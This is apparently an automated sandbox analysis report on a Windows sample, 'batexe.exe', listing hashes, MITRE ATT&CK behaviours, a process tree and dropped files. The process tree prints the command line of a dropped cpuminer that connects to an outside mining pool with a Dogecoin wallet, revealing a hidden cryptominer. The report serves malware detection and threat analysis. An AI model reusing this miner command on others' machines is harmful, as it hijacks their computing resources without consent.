73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 10:09

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1340	b2e.exe
5248	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
5248	cpuminer-sse2.exe
5248	cpuminer-sse2.exe
5248	cpuminer-sse2.exe
5248	cpuminer-sse2.exe
5248	cpuminer-sse2.exe
5248	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2044-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 1340	2044	batexe.exe	85
PID 2044 wrote to memory of 1340	2044	batexe.exe	85
PID 2044 wrote to memory of 1340	2044	batexe.exe	85
PID 1340 wrote to memory of 1416	1340	b2e.exe	86
PID 1340 wrote to memory of 1416	1340	b2e.exe	86
PID 1340 wrote to memory of 1416	1340	b2e.exe	86
PID 1416 wrote to memory of 5248	1416	cmd.exe	89
PID 1416 wrote to memory of 5248	1416	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\51D4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe

Filesize
5.4MB

MD5
bf5dcbe32bc324e57a98a812a5b5925a

SHA1
31ab92c82cd65ed21f6706ff13ee752b4cd67ad6

SHA256
43fb7fa314eeed285ee89416ea1263363a2dfe1a07d045faf870094bcaa9e840

SHA512
859d9743ff2bd8937c21a3ac077f16c8af7f50b99bf16c08f6924741f70a2067031768fa179bcde50ace3c9e8c460f465d6ad8b42a6c4ead8bcc51e87f1df14a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe

Filesize
1.8MB

MD5
33358b591ee9923a58e8bb39ace9141c

SHA1
71944653302df0ee3af519f302cde3ada10245a4

SHA256
165d048a131dae33cd10a9c654db76f610a51c3355791c2afe45e41340664d34

SHA512
b1cfa6cf14687a54470124878ea20e51d9fb26442e12a1cc75c678d61998f1bb7881c60cd2dfb037e747c3326d49aa6bd4a4db0549295b55e2d8ab3df6eb5a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3CF4.tmp\b2e.exe

Filesize
1.7MB

MD5
c10ca44ee275166609619d14f2962e4d

SHA1
57bbf873d5928a4ca3cfbfc96aa43d501a04aaa3

SHA256
7af1c66457ccbdd21f31615e39d1911bfd5610830bf59be9e4c28538d9f71197

SHA512
ecbcae090264bd3e70ecc029b21800483ceb3b829a3df79335639ca9ac2ecb9ac5ed9c6d18fdaf8801bd1db72d60fcfeac68c4b37ce43bb37780004099704672

Download Submit
C:\Users\Admin\AppData\Local\Temp\51D4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
171KB

MD5
76db1f1dfcdd075f954fa716490ad902

SHA1
f2a1d8923839250b3fadd6ffefe5077ea536dbf1

SHA256
d3b9cb564db83d06d9b5dee804f618ed63396f6654b99a28ebebc570e70f6ed3

SHA512
84ae65dfd7ce7c238b40e889426f1e3c4caf81509219c4cb7abb121e6bd1faf10a03922021e4bd0141afbbea610b104fb857387ed73a8df215869ec3432d978e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
99KB

MD5
18b1af906ee66f5f9ed70cb795ca80a6

SHA1
261b544158619e8b887b221d696318b9811d8746

SHA256
79251287eb9b86021539e6c22b1a9cb0a9c189a16804e334e937e2d8db075f56

SHA512
563ad1b76afc39c083fac8c082198c2dd882b90bc7d9ca1c31abcc706c1bfbd0d49938f682fdfeedc43f447960d3fa1367f3862c9fcc0a82a52c674f850e5130

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
79KB

MD5
953496141ca496a485b14b9b987c2d5c

SHA1
11f6002515175181ce42a76387f5da92ebb5275d

SHA256
12c9556d376611ebe2761a3285a42b58a0bd695f18af64e93e0dd9cc9261e826

SHA512
16fb738237e026ef5d19c22789845d092a3c4166dbec1a8b6882a850301bba6b57e43562e5e3add173e54dc63f6b1d75f48e9d31a5a687ecad7d7ed1e0a097ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
33KB

MD5
a2b7ad210301e77a2b54f11267d940d3

SHA1
3310fd4d1a30f9acd63c4264e33a42f5ea89636a

SHA256
1f6be7cbdba0018b84ac6d45a37c17c0efe51e19bbfbc99595c61ea171101767

SHA512
4689f085e143fe1d5cd6226669c944537c765279980266f38962fa020424c0ee3964144972010aa69c4e86464fa0626b62b9a91156b468ed9571cd7b16ec8433

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
148KB

MD5
509d35f6b33da35bf212b4e55b26c44f

SHA1
fd7489f6db84559a900bbe386cdbc6e24110d053

SHA256
b64846089fc7c89181faa4b7a39e716515a572a60826c265c43e343b5de5b54c

SHA512
7d3adaff94bdadddac908f5d201538a7c7c52f9243dc7a281dbf682cdcce8126cf3fec13663d882da9e9823b6cdb5a1514bf56cdb2907f44bf63e67b901208b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
65KB

MD5
45b5b3abffe239c3aaedb5c1542b37f6

SHA1
641c27a222bef177a1284f0fd462949e0b9f0b1e

SHA256
3a9304c85f956d4cc57afb8b00d94154c0011f3c97236212e3911ccbc91fcfbd

SHA512
f322e67363d7c4b32d420f91785b9194177797c0d37b8ab3f3c26b0b8b54af1cd14caaee3f5663620f64784d2f10ad4b75ffde59d240cb72bb41a68e4ec65e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
116KB

MD5
db9f8201b09978cdd502a38117e57edd

SHA1
509b79675178d3ff7e049a9868354621af0d420b

SHA256
317551401ccb0a1b2c8652778558a93d63910029c0ed2f8dd1cee4ded6598794

SHA512
84e9ea836c3517c8fb25e113cfe9ceecb96e639285cfeee80b3040684587943d6dd24f7795c3e863efff99428640c359891a66701ee6955ec010d74286081800

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
147KB

MD5
d9e5447a432b3ef127c4a313713b512b

SHA1
8ccd2477c1d62bbf43440a377218ada19058d516

SHA256
a81c5169d28cca0b36e5259233f2816dc26a676aff454877b1544f16af092f77

SHA512
f5ff793b7ffe56926b86299c9aab3e0ef30903f04704a0ccfe5c500cde49639ece7ecc4ed9c05bfaa38b626d576bba60d86b11a0e2901351a8a7ae6c9993f6b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
138KB

MD5
60a8c8d325c84b361c16efd0e302da44

SHA1
0ee5e5549827f6e9cc503d19305a2dc934140fe9

SHA256
3d2ecd59db10c3df228ef7a30e656b3de521bc7c32e8161de74399b874a88715

SHA512
3dcc6bde2fcde7c221267222e7c3dad84cd63cf640b929f13f4484f2d7525dda2bb02eb9cf33aa31acc01c8a50b224d38cfbda349ece8ae16dc710a4c9b5dd00

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
389KB

MD5
9d986a488dcad079f6470dcfcd2843c5

SHA1
cef63b4b5fc42917ca8aa7e9ac5d40f2be397514

SHA256
b3d3afb59e51ab83fdf744ae677fe6c984a2e92b90ce46ee3c9ec4030d5b19ed

SHA512
2c7c7de68a34ccfa46cceefe10d424c4e7848b7a2567b76780b35ec8b931379a1223c46561c5528013ddda0679c165a82f6434df380bd86c2ecba2d8e9040630

Download Submit
memory/1340-29-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2044-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5248-50-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5248-47-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-48-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/5248-49-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5248-51-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5248-44-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5248-62-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-67-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download